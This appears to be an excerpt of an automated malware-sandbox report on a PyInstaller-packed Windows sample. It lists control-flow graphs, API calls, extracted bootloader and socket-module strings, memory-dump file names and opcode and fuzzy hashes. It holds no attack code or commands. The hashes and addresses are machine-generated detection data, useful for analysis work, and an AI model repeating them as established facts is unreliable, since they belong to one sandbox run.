                                                                                                                                                                                                                              control_flow_graph 1902 7ff7ead01210-7ff7ead0126d call 7ff7ead0bd80 1905 7ff7ead0126f-7ff7ead01296 call 7ff7ead02710 1902->1905 1906 7ff7ead01297-7ff7ead012af call 7ff7ead14f44 1902->1906 1911 7ff7ead012d4-7ff7ead012e4 call 7ff7ead14f44 1906->1911 1912 7ff7ead012b1-7ff7ead012cf call 7ff7ead14f08 call 7ff7ead02910 1906->1912 1918 7ff7ead012e6-7ff7ead01304 call 7ff7ead14f08 call 7ff7ead02910 1911->1918 1919 7ff7ead01309-7ff7ead0131b 1911->1919 1924 7ff7ead01439-7ff7ead0146d call 7ff7ead0ba60 call 7ff7ead14f30 * 2 1912->1924 1918->1924 1920 7ff7ead01320-7ff7ead01345 call 7ff7ead1039c 1919->1920 1931 7ff7ead01431 1920->1931 1932 7ff7ead0134b-7ff7ead01355 call 7ff7ead10110 1920->1932 1931->1924 1932->1931 1938 7ff7ead0135b-7ff7ead01367 1932->1938 1940 7ff7ead01370-7ff7ead01398 call 7ff7ead0a1c0 1938->1940 1943 7ff7ead01416-7ff7ead0142c call 7ff7ead02710 1940->1943 1944 7ff7ead0139a-7ff7ead0139d 1940->1944 1943->1931 1946 7ff7ead01411 1944->1946 1947 7ff7ead0139f-7ff7ead013a9 1944->1947 1946->1943 1948 7ff7ead013d4-7ff7ead013d7 1947->1948 1949 7ff7ead013ab-7ff7ead013b9 call 7ff7ead10adc 1947->1949 1951 7ff7ead013ea-7ff7ead013ef 1948->1951 1952 7ff7ead013d9-7ff7ead013e7 call 7ff7ead29e30 1948->1952 1953 7ff7ead013be-7ff7ead013c1 1949->1953 1951->1940 1955 7ff7ead013f5-7ff7ead013f8 1951->1955 1952->1951 1956 7ff7ead013c3-7ff7ead013cd call 7ff7ead10110 1953->1956 1957 7ff7ead013cf-7ff7ead013d2 1953->1957 1959 7ff7ead0140c-7ff7ead0140f 1955->1959 1960 7ff7ead013fa-7ff7ead013fd 1955->1960 1956->1951 1956->1957 1957->1943 1959->1931 1960->1943 1962 7ff7ead013ff-7ff7ead01407 1960->1962 1962->1920
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
                                                                                                                                                                                                                              • Instruction ID: 62705e2bbc6e83401a42566eb4fc28e506f6df863e2286ddd92be26972ff1290
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB51D362A0864285F620FB21A4903BAA392FF84798FC44176EE4D477DDEE3CE541C722
                                                                                                                                                                                                                              Function 00007FF8E81354AC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1964 7ff8e81354ac-7ff8e81354e0 1965 7ff8e81354e3-7ff8e81354e6 1964->1965 1966 7ff8e81354f8-7ff8e81354fb 1965->1966 1967 7ff8e81354e8-7ff8e81354f0 1965->1967 1970 7ff8e813551f-7ff8e813552e call 7ff8e8139450 1966->1970 1971 7ff8e81354fd-7ff8e8135509 call 7ff8e81393e8 1966->1971 1968 7ff8e81354f6 1967->1968 1969 7ff8e8135597-7ff8e81355a5 call 7ff8e8139568 1967->1969 1974 7ff8e8135531 1968->1974 2017 7ff8e81355a8 call 7ff8e813660c 1969->2017 2018 7ff8e81355a8 call 7ff8e8136bec 1969->2018 1970->1974 1978 7ff8e8135534-7ff8e813554c call 7ff8e81348b0 1971->1978 1981 7ff8e813550b-7ff8e813550e 1971->1981 1974->1978 1988 7ff8e813558e-7ff8e8135591 1978->1988 1989 7ff8e813554e-7ff8e8135551 1978->1989 1984 7ff8e8135628-7ff8e8135639 call 7ff8e81394e8 1981->1984 1985 7ff8e8135514-7ff8e813551a 1981->1985 1982 7ff8e81355ac-7ff8e81355b9 call 7ff8e8139490 1995 7ff8e81355bb-7ff8e81355be 1982->1995 1996 7ff8e8135619-7ff8e813561c 1982->1996 1986 7ff8e813563f 1984->1986 1985->1986 1994 7ff8e8135644-7ff8e8135652 1986->1994 1988->1969 1988->1981 1992 7ff8e813555b-7ff8e8135566 WSAGetLastError 1989->1992 1993 7ff8e8135553-7ff8e8135559 WSAGetLastError 1989->1993 1997 7ff8e813556c-7ff8e8135574 call 7ff8e81393b0 1992->1997 1998 7ff8e8135614-7ff8e8135617 1992->1998 1993->1992 2001 7ff8e81355c8-7ff8e81355d3 WSAGetLastError 1995->2001 2002 7ff8e81355c0-7ff8e81355c6 WSAGetLastError 1995->2002 1999 7ff8e813561e 1996->1999 2000 7ff8e8135624-7ff8e8135626 1996->2000 1997->1965 2009 7ff8e813557a-7ff8e813557d 1997->2009 1998->1986 1999->2000 2000->1994 2005 7ff8e81355e1-7ff8e81355e6 2001->2005 2006 7ff8e81355d5-7ff8e81355dd call 7ff8e81393b0 2001->2006 2002->2001 2010 7ff8e81355e8-7ff8e81355f7 WSAGetLastError 2005->2010 2011 7ff8e813560f-7ff8e8135612 2005->2011 2006->1969 2016 7ff8e81355df 2006->2016 2009->1986 2014 7ff8e8135583-7ff8e8135589 2009->2014 2010->1965 2012 7ff8e81355fd-7ff8e8135608 WSAGetLastError 2010->2012 2011->1986 2011->1998 2012->2011 2015 7ff8e813560a 2012->2015 2014->1986 2015->1965 2016->2009 2017->1982 2018->1982
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$select
                                                                                                                                                                                                                              • String ID: timed out
                                                                                                                                                                                                                              • API String ID: 1043644060-3163636755
                                                                                                                                                                                                                              • Opcode ID: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
                                                                                                                                                                                                                              • Instruction ID: 5c93ede24b784126b9ba09f7c31205502268de7df16859575198726d9712ad98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24418CB1E0DA4286FA655FE1A8443BDA2A1BF45FE5F064130CD4E427A4DF3CF885C60A
                                                                                                                                                                                                                              Function 00007FF7EAD036B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02C50: MessageBoxW.USER32 ref: 00007FF7EAD02D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction ID: aa58795fd151d1a2addeb85b119a2229fb7102c7a0d362bdb799c6b4eaf65dcc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48217F61B1864241FA20F724E8953FAA756FF88358FC042B3E65D825DDEE3CE505C762
                                                                                                                                                                                                                              Function 00007FF7EAD1BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2118 7ff7ead1ba5c-7ff7ead1ba82 2119 7ff7ead1ba9d-7ff7ead1baa1 2118->2119 2120 7ff7ead1ba84-7ff7ead1ba98 call 7ff7ead14ee8 call 7ff7ead14f08 2118->2120 2122 7ff7ead1be77-7ff7ead1be83 call 7ff7ead14ee8 call 7ff7ead14f08 2119->2122 2123 7ff7ead1baa7-7ff7ead1baae 2119->2123 2138 7ff7ead1be8e 2120->2138 2141 7ff7ead1be89 call 7ff7ead1a8e0 2122->2141 2123->2122 2124 7ff7ead1bab4-7ff7ead1bae2 2123->2124 2124->2122 2127 7ff7ead1bae8-7ff7ead1baef 2124->2127 2130 7ff7ead1bb08-7ff7ead1bb0b 2127->2130 2131 7ff7ead1baf1-7ff7ead1bb03 call 7ff7ead14ee8 call 7ff7ead14f08 2127->2131 2136 7ff7ead1bb11-7ff7ead1bb17 2130->2136 2137 7ff7ead1be73-7ff7ead1be75 2130->2137 2131->2141 2136->2137 2142 7ff7ead1bb1d-7ff7ead1bb20 2136->2142 2139 7ff7ead1be91-7ff7ead1bea8 2137->2139 2138->2139 2141->2138 2142->2131 2145 7ff7ead1bb22-7ff7ead1bb47 2142->2145 2147 7ff7ead1bb7a-7ff7ead1bb81 2145->2147 2148 7ff7ead1bb49-7ff7ead1bb4b 2145->2148 2149 7ff7ead1bb83-7ff7ead1bb8f call 7ff7ead1d5fc 2147->2149 2150 7ff7ead1bb56-7ff7ead1bb6d call 7ff7ead14ee8 call 7ff7ead14f08 call 7ff7ead1a8e0 2147->2150 2151 7ff7ead1bb4d-7ff7ead1bb54 2148->2151 2152 7ff7ead1bb72-7ff7ead1bb78 2148->2152 2158 7ff7ead1bb94-7ff7ead1bbab call 7ff7ead1a948 * 2 2149->2158 2181 7ff7ead1bd00 2150->2181 2151->2150 2151->2152 2153 7ff7ead1bbf8-7ff7ead1bc0f 2152->2153 2156 7ff7ead1bc8a-7ff7ead1bc94 call 7ff7ead2391c 2153->2156 2157 7ff7ead1bc11-7ff7ead1bc19 2153->2157 2168 7ff7ead1bc9a-7ff7ead1bcaf 2156->2168 2169 7ff7ead1bd1e 2156->2169 2157->2156 2162 7ff7ead1bc1b-7ff7ead1bc1d 2157->2162 2183 7ff7ead1bbc8-7ff7ead1bbf3 call 7ff7ead1c284 2158->2183 2184 7ff7ead1bbad-7ff7ead1bbc3 call 7ff7ead14f08 call 7ff7ead14ee8 2158->2184 2162->2156 2166 7ff7ead1bc1f-7ff7ead1bc35 2162->2166 2166->2156 2171 7ff7ead1bc37-7ff7ead1bc43 2166->2171 2168->2169 2173 7ff7ead1bcb1-7ff7ead1bcc3 GetConsoleMode 2168->2173 2177 7ff7ead1bd23-7ff7ead1bd43 ReadFile 2169->2177 2171->2156 2175 7ff7ead1bc45-7ff7ead1bc47 2171->2175 2173->2169 2180 7ff7ead1bcc5-7ff7ead1bccd 2173->2180 2175->2156 2182 7ff7ead1bc49-7ff7ead1bc61 2175->2182 2178 7ff7ead1bd49-7ff7ead1bd51 2177->2178 2179 7ff7ead1be3d-7ff7ead1be46 GetLastError 2177->2179 2178->2179 2185 7ff7ead1bd57 2178->2185 2188 7ff7ead1be48-7ff7ead1be5e call 7ff7ead14f08 call 7ff7ead14ee8 2179->2188 2189 7ff7ead1be63-7ff7ead1be66 2179->2189 2180->2177 2187 7ff7ead1bccf-7ff7ead1bcf1 ReadConsoleW 2180->2187 2190 7ff7ead1bd03-7ff7ead1bd0d call 7ff7ead1a948 2181->2190 2182->2156 2191 7ff7ead1bc63-7ff7ead1bc6f 2182->2191 2183->2153 2184->2181 2193 7ff7ead1bd5e-7ff7ead1bd73 2185->2193 2195 7ff7ead1bd12-7ff7ead1bd1c 2187->2195 2196 7ff7ead1bcf3 GetLastError 2187->2196 2188->2181 2200 7ff7ead1bcf9-7ff7ead1bcfb call 7ff7ead14e7c 2189->2200 2201 7ff7ead1be6c-7ff7ead1be6e 2189->2201 2190->2139 2191->2156 2199 7ff7ead1bc71-7ff7ead1bc73 2191->2199 2193->2190 2204 7ff7ead1bd75-7ff7ead1bd80 2193->2204 2195->2193 2196->2200 2199->2156 2208 7ff7ead1bc75-7ff7ead1bc85 2199->2208 2200->2181 2201->2190 2210 7ff7ead1bda7-7ff7ead1bdaf 2204->2210 2211 7ff7ead1bd82-7ff7ead1bd9b call 7ff7ead1b674 2204->2211 2208->2156 2214 7ff7ead1be2b-7ff7ead1be38 call 7ff7ead1b4b4 2210->2214 2215 7ff7ead1bdb1-7ff7ead1bdc3 2210->2215 2218 7ff7ead1bda0-7ff7ead1bda2 2211->2218 2214->2218 2219 7ff7ead1be1e-7ff7ead1be26 2215->2219 2220 7ff7ead1bdc5 2215->2220 2218->2190 2219->2190 2222 7ff7ead1bdca-7ff7ead1bdd1 2220->2222 2223 7ff7ead1be0d-7ff7ead1be18 2222->2223 2224 7ff7ead1bdd3-7ff7ead1bdd7 2222->2224 2223->2219 2225 7ff7ead1bdd9-7ff7ead1bde0 2224->2225 2226 7ff7ead1bdf3 2224->2226 2225->2226 2228 7ff7ead1bde2-7ff7ead1bde6 2225->2228 2227 7ff7ead1bdf9-7ff7ead1be09 2226->2227 2227->2222 2229 7ff7ead1be0b 2227->2229 2228->2226 2230 7ff7ead1bde8-7ff7ead1bdf1 2228->2230 2229->2219 2230->2227
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                              • Instruction ID: be7efa2d6ec71f8b965ffb037162accb55d07a8a9701b2b3a91cd888d3e0b722
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0C1E472A0C68681F761EB3590407BDBB51FBA1B80FD541B3EA4E07799CE7CE4458722
                                                                                                                                                                                                                              Function 00007FF8E8136FF4 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 82COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: setsockopt
                                                                                                                                                                                                                              • String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
                                                                                                                                                                                                                              • API String ID: 3981526788-1608436615
                                                                                                                                                                                                                              • Opcode ID: 32ca9612667a1d97849a044e9fa1363f5e862fb873e08f953f5db1e1b9d64d2d
                                                                                                                                                                                                                              • Instruction ID: 8e6c30fd53852608f27a2b650e5644d8efce898f780d219070bee2b511c81d70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32ca9612667a1d97849a044e9fa1363f5e862fb873e08f953f5db1e1b9d64d2d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39411F32608B86D2EB208FA1E9407AE7361FB89BD4F520532DA9D43B54DF3CD548CB45
                                                                                                                                                                                                                              Function 00007FF7EAD06360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                              • Instruction ID: 927f537e46426d2aaace940f905dbf842ef3cc4270607b018656d2f6871e6012
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E417121A1CA8691FA21FB20E4943E9A316FF44358FC001B3EA5C4369DEF7CE509C762
                                                                                                                                                                                                                              Function 00007FF8E81347A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2440 7ff8e81347a0-7ff8e81347dc call 7ff8e8139568 connect call 7ff8e8139490 2444 7ff8e81347e2-7ff8e81347e4 2440->2444 2445 7ff8e81347ea-7ff8e8134801 WSAGetLastError * 2 2444->2445 2446 7ff8e8134898 2444->2446 2447 7ff8e813482d-7ff8e8134834 2445->2447 2448 7ff8e8134803-7ff8e813480b call 7ff8e81393b0 2445->2448 2449 7ff8e813489a-7ff8e81348ac 2446->2449 2451 7ff8e8134816-7ff8e8134819 2447->2451 2452 7ff8e8134836-7ff8e813483c 2447->2452 2457 7ff8e813486c-7ff8e8134871 2448->2457 2458 7ff8e813480d-7ff8e8134814 2448->2458 2454 7ff8e813481b-7ff8e813482b WSASetLastError 2451->2454 2455 7ff8e8134894-7ff8e8134896 2451->2455 2452->2451 2456 7ff8e813483e-7ff8e8134858 2452->2456 2454->2449 2455->2449 2459 7ff8e813485a-7ff8e813486a call 7ff8e81354ac 2456->2459 2460 7ff8e8134873-7ff8e813488c call 7ff8e81354ac 2456->2460 2457->2449 2458->2451 2458->2456 2459->2446 2459->2457 2460->2446 2466 7ff8e813488e-7ff8e8134892 2460->2466 2466->2449
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$connect
                                                                                                                                                                                                                              • String ID: 3'
                                                                                                                                                                                                                              • API String ID: 375857812-280543908
                                                                                                                                                                                                                              • Opcode ID: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
                                                                                                                                                                                                                              • Instruction ID: f159fba161bbdbdcdfd7dcee90c220a65cd0e8bfeab45c12b524cbc3285f89da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C315C25B08B8286FB608FE6A9443BD6690FF54BE4F024535EE4D93795DF3CE440C60A
                                                                                                                                                                                                                              Function 00007FF7EAD15628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction ID: d7060ce8004206e8843f8309fcbb555d2b867fba51587e4af50d8cc12d3a0944
